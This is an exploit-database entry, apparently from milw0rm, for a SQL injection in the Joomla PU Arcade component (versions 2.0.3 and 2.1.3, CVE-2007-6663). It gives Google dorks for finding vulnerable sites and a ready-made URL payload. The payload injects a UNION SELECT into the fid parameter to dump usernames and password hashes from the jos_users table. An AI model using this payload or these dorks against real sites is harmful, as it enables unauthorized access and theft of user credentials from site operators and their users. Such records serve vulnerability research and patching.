[] NeoSense

Joomla! Component PU Arcade 2.1.3 - SQL Injection

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2007-12-30 
date_updated:  
verified: 1 
codes: OSVDB-39886;CVE-2007-6663;OSVDB-39787 
tags: 
aliases:  
screenshot_url:  
application_url: 

#########################################################################
          Joomla Component  PU Arcade Remote SQL Injection Exploit
#########################################################################

## AUTHOR :  HouSSamix of H-T TeaM
We are ( HouSSamix _ ToXiC350 _ CoNaN )

## HOME : http://no-hack.net

## Script :  PU Arcade Joomla Component ( Tested in version 2.0.3 & 2.1.3 Beta )

## Download : http://www.pragmaticutopia.com/

## DorKs :  PU Arcade by www.pragmaticutopia.com
                         inurl:index.php?option=com_puarcade
                         inurl:/option,com_puarcade/

## EXPLOIT :

http://server.com/Path/index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--


## GREETZ  :  GoLd_M , RoMaNcYxHaCkEr , Jiko , cx0x  and all musulmans hackers

#########################################################################
           Joomla Component  PU Arcade Remote SQL Injection Exploit
#########################################################################

# milw0rm.com [2007-12-31]